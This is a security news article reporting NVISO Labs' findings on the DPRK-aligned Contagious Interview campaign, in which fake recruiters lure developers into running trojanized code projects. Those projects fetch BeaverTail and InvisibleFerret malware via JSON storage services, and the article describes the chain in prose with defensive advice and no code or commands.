Cybersecurity researchers have uncovered a sophisticated campaign where threat actors abuse legitimate JSON storage services to deliver malware to software developers.
The campaign, known as Contagious Interview, represents a significant shift in how attackers are concealing malicious payloads within seemingly legitimate development projects.
By exploiting platforms such as JSON Keeper, JSONsilo, and npoint.io, threat actors have found a way to blend malicious code delivery into legitimate traffic, making detection increasingly difficult.
The Contagious Interview campaign has been active since at least 2023 and is aligned with Democratic People’s Republic of Korea (DPRK) actors.
The operation specifically targets software developers across Windows, Linux, and macOS systems, with particular focus on those working in cryptocurrency and Web3 projects.
The attackers’ goal is financial gain, aiming to steal sensitive information and digital assets from victims.
Initial access is gained through meticulously crafted social engineering tactics, where fake recruiters approach potential victims on job searching platforms like LinkedIn with compelling job opportunities.
The attack typically begins with a professionally crafted message from a fake recruiter claiming to represent a legitimate company working on real estate or Web3 projects.
.webp "Threat Actors Leverage JSON Storage Services to Host and Deliver Malware Via Trojanized Code Projects 3")
After several messages exchanging pleasantries and discussing the role, the recruiter shares a demo project hosted on GitLab or GitHub as part of an interview assessment.
NVISO Labs security analysts identified that this approach successfully tricks developers into downloading and executing trojanized code.
Attack Mechanism
The demo projects appear legitimate, featuring detailed readme files and professional layouts that showcase real estate platforms or cryptocurrency applications, creating a convincing facade.
.webp "Threat Actors Leverage JSON Storage Services to Host and Deliver Malware Via Trojanized Code Projects 4")
InvisibleFerret’s Pastebin functionality (Source – NVISO Labs)
Once developers download and run the projects using Node.js, the infection chain begins. The real technical cleverness lies in how the malware is delivered.
Configuration files within these projects contain base64-encoded variables that mask JSON storage service URLs. When decoded, these variables reveal links to JSON Keeper or similar platforms hosting heavily obfuscated JavaScript code.
This code is automatically fetched and executed through legitimate Node.js operations, making it difficult for traditional security tools to catch the attack.
The obfuscated JavaScript fetches the BeaverTail infostealer, which specializes in stealing wallet information, system data, and browser extension information related to cryptocurrency.
Following BeaverTail execution, the InvisibleFerret Remote Access Tool is deployed in subsequent stages.
This modular framework, written in Python, carries multiple capabilities, including data exfiltration, system fingerprinting, and downloading additional payloads.
The attack chain continues through multiple stages, utilizing legitimate services like Pastebin and Railway to host payloads and evade detection.
What distinguishes this campaign is the attacker’s sophisticated use of legitimate infrastructure to avoid detection.
By hosting malware through widely used JSON storage services and code repositories, the threat actors ensure their traffic appears normal.
Organizations should exercise extreme caution when receiving unsolicited code from recruiters or any unknown sources.
Inspecting configuration files for suspicious API keys and monitoring Node.js execution behaviors can help identify and prevent similar attacks before the threat establishes itself within the network.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
